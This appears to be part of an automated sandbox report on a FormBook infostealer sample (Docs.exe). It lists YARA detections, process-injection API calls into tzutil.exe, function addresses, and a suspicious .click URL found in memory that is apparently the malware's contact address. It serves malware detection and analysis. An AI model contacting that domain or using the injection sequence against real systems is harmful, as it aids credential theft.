                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                      Source: tzutil.exe, 00000007.00000002.3290025914.0000000004768000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.00000000034A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0042C953 NtClose,3_2_0042C953
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2B60 NtClose,LdrInitializeThunk,3_2_015E2B60
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_015E2DF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_015E2C70
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E35C0 NtCreateMutant,LdrInitializeThunk,3_2_015E35C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E4340 NtSetContextThread,3_2_015E4340
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E4650 NtSuspendThread,3_2_015E4650
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2BF0 NtAllocateVirtualMemory,3_2_015E2BF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2BE0 NtQueryValueKey,3_2_015E2BE0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2B80 NtQueryInformationFile,3_2_015E2B80
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2BA0 NtEnumerateValueKey,3_2_015E2BA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2AD0 NtReadFile,3_2_015E2AD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2AF0 NtWriteFile,3_2_015E2AF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2AB0 NtWaitForSingleObject,3_2_015E2AB0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2D10 NtMapViewOfSection,3_2_015E2D10
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2D00 NtSetInformationFile,3_2_015E2D00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2D30 NtUnmapViewOfSection,3_2_015E2D30
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2DD0 NtDelayExecution,3_2_015E2DD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2DB0 NtEnumerateKey,3_2_015E2DB0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2C60 NtCreateKey,3_2_015E2C60
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2C00 NtQueryInformationProcess,3_2_015E2C00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2CC0 NtQueryVirtualMemory,3_2_015E2CC0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2CF0 NtOpenProcess,3_2_015E2CF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2CA0 NtQueryInformationToken,3_2_015E2CA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2F60 NtCreateProcessEx,3_2_015E2F60
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2F30 NtCreateSection,3_2_015E2F30
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2FE0 NtCreateFile,3_2_015E2FE0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2F90 NtProtectVirtualMemory,3_2_015E2F90
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2FB0 NtResumeThread,3_2_015E2FB0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2FA0 NtQuerySection,3_2_015E2FA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2E30 NtWriteVirtualMemory,3_2_015E2E30
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2EE0 NtQueueApcThread,3_2_015E2EE0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2E80 NtReadVirtualMemory,3_2_015E2E80
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2EA0 NtAdjustPrivilegesToken,3_2_015E2EA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E3010 NtOpenDirectoryObject,3_2_015E3010
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E3090 NtSetValueKey,3_2_015E3090
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E39B0 NtGetContextThread,3_2_015E39B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E3D70 NtOpenThread,3_2_015E3D70
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E3D10 NtOpenProcessToken,3_2_015E3D10
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F4340 NtSetContextThread,LdrInitializeThunk,7_2_039F4340
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F4650 NtSuspendThread,LdrInitializeThunk,7_2_039F4650
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_039F2BA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_039F2BF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_039F2BE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2B60 NtClose,LdrInitializeThunk,7_2_039F2B60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2AD0 NtReadFile,LdrInitializeThunk,7_2_039F2AD0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2AF0 NtWriteFile,LdrInitializeThunk,7_2_039F2AF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2FB0 NtResumeThread,LdrInitializeThunk,7_2_039F2FB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2FE0 NtCreateFile,LdrInitializeThunk,7_2_039F2FE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2F30 NtCreateSection,LdrInitializeThunk,7_2_039F2F30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_039F2E80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_039F2EE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2DD0 NtDelayExecution,LdrInitializeThunk,7_2_039F2DD0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_039F2DF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_039F2D10
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_039F2D30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_039F2CA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_039F2C70
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2C60 NtCreateKey,LdrInitializeThunk,7_2_039F2C60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F35C0 NtCreateMutant,LdrInitializeThunk,7_2_039F35C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F39B0 NtGetContextThread,LdrInitializeThunk,7_2_039F39B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2B80 NtQueryInformationFile,7_2_039F2B80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2AB0 NtWaitForSingleObject,7_2_039F2AB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2F90 NtProtectVirtualMemory,7_2_039F2F90
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2FA0 NtQuerySection,7_2_039F2FA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2F60 NtCreateProcessEx,7_2_039F2F60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2EA0 NtAdjustPrivilegesToken,7_2_039F2EA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2E30 NtWriteVirtualMemory,7_2_039F2E30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2DB0 NtEnumerateKey,7_2_039F2DB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2D00 NtSetInformationFile,7_2_039F2D00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2CC0 NtQueryVirtualMemory,7_2_039F2CC0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2CF0 NtOpenProcess,7_2_039F2CF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F2C00 NtQueryInformationProcess,7_2_039F2C00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F3090 NtSetValueKey,7_2_039F3090
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F3010 NtOpenDirectoryObject,7_2_039F3010
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F3D10 NtOpenProcessToken,7_2_039F3D10
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F3D70 NtOpenThread,7_2_039F3D70
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03229780 NtClose,7_2_03229780
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032296E0 NtDeleteFile,7_2_032296E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032295F0 NtReadFile,7_2_032295F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03229480 NtCreateFile,7_2_03229480
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032298E0 NtAllocateVirtualMemory,7_2_032298E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_00E8D63C0_2_00E8D63C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723D7080_2_0723D708
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723DC280_2_0723DC28
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723DCFE0_2_0723DCFE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723AA600_2_0723AA60
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723A7B80_2_0723A7B8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723A7C80_2_0723A7C8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723D6FA0_2_0723D6FA
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723DC1A0_2_0723DC1A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_0723AA4F0_2_0723AA4F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004189C33_2_004189C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0041021B3_2_0041021B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004012203_2_00401220
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004102233_2_00410223
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004022DE3_2_004022DE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004022E03_2_004022E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00416BCE3_2_00416BCE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00416BD33_2_00416BD3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004104433_2_00410443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0040E4633_2_0040E463
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0040E5B33_2_0040E5B3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0040262C3_2_0040262C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004026303_2_00402630
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00402F503_2_00402F50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0042EF233_2_0042EF23
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016381583_2_01638158
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A01003_2_015A0100
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164A1183_2_0164A118
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016681CC3_2_016681CC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016641A23_2_016641A2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016701AA3_2_016701AA
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016420003_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166A3523_2_0166A352
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016703E63_2_016703E6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F03_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016502743_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016302C03_2_016302C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B05353_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016705913_2_01670591
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016624463_2_01662446
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016544203_2_01654420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165E4F63_2_0165E4F6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D47503_2_015D4750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B07703_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AC7C03_2_015AC7C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CC6E03_2_015CC6E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C69623_2_015C6962
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0167A9A63_2_0167A9A6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A03_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BA8403_2_015BA840
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B28403_2_015B2840
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE8F03_2_015DE8F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015968B83_2_015968B8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166AB403_2_0166AB40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01666BD73_2_01666BD7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AEA803_2_015AEA80
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BAD003_2_015BAD00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164CD1F3_2_0164CD1F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AADE03_2_015AADE0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C8DBF3_2_015C8DBF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0C003_2_015B0C00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0CF23_2_015A0CF2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650CB53_2_01650CB5
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01624F403_2_01624F40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01652F303_2_01652F30
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D0F303_2_015D0F30
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F2F283_2_015F2F28
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2FC83_2_015A2FC8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BCFE03_2_015BCFE0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162EFA03_2_0162EFA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0E593_2_015B0E59
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166EE263_2_0166EE26
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166EEDB3_2_0166EEDB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2E903_2_015C2E90
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166CE933_2_0166CE93
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0167B16B3_2_0167B16B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159F1723_2_0159F172
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E516C3_2_015E516C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BB1B03_2_015BB1B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166F0E03_2_0166F0E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016670E93_2_016670E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B70C03_2_015B70C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165F0CC3_2_0165F0CC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159D34C3_2_0159D34C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166132D3_2_0166132D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F739A3_2_015F739A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016512ED3_2_016512ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CB2C03_2_015CB2C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B52A03_2_015B52A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016675713_2_01667571
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016795C33_2_016795C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164D5B03_2_0164D5B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A14603_2_015A1460
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166F43F3_2_0166F43F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166F7B03_2_0166F7B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F56303_2_015F5630
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016616CC3_2_016616CC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B99503_2_015B9950
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CB9503_2_015CB950
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016459103_2_01645910
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161D8003_2_0161D800
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B38E03_2_015B38E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166FB763_2_0166FB76
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01625BF03_2_01625BF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015EDBF93_2_015EDBF9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CFB803_2_015CFB80
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01623A6C3_2_01623A6C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01667A463_2_01667A46
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166FA493_2_0166FA49
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165DAC63_2_0165DAC6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01651AA33_2_01651AA3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164DAAC3_2_0164DAAC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F5AA03_2_015F5AA0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01667D733_2_01667D73
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B3D403_2_015B3D40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01661D5A3_2_01661D5A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CFDC03_2_015CFDC0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01629C323_2_01629C32
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166FCF23_2_0166FCF2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166FF093_2_0166FF09
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01573FD53_2_01573FD5
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01573FD23_2_01573FD2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B1F923_2_015B1F92
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166FFB13_2_0166FFB1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B9EB03_2_015B9EB0
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359CB4E6_2_0359CB4E
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_035943BB6_2_035943BB
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_035943B36_2_035943B3
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_035B30BB6_2_035B30BB
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359274B6_2_0359274B
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359274C6_2_0359274C
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359AD6B6_2_0359AD6B
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359AD666_2_0359AD66
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_035945DB6_2_035945DB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A803E67_2_03A803E6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039CE3F07_2_039CE3F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7A3527_2_03A7A352
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A402C07_2_03A402C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A602747_2_03A60274
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A801AA7_2_03A801AA
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A741A27_2_03A741A2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A781CC7_2_03A781CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039B01007_2_039B0100
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A5A1187_2_03A5A118
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A481587_2_03A48158
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A520007_2_03A52000
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039BC7C07_2_039BC7C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039E47507_2_039E4750
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C07707_2_039C0770
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039DC6E07_2_039DC6E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A805917_2_03A80591
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C05357_2_039C0535
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A6E4F67_2_03A6E4F6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A644207_2_03A64420
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A724467_2_03A72446
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A76BD77_2_03A76BD7
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7AB407_2_03A7AB40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039BEA807_2_039BEA80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A8A9A67_2_03A8A9A6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C29A07_2_039C29A0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039D69627_2_039D6962
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039A68B87_2_039A68B8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039EE8F07_2_039EE8F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039CA8407_2_039CA840
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C28407_2_039C2840
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A3EFA07_2_03A3EFA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039B2FC87_2_039B2FC8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039CCFE07_2_039CCFE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A02F287_2_03A02F28
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A62F307_2_03A62F30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039E0F307_2_039E0F30
